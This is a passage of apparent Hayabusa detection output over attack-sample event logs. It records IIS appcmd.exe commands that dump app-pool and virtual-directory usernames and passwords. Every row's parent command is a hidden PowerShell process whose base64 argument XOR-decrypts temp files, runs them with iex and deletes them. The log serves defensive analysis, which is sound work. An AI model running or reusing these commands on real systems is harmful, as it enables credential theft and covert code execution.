ACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEA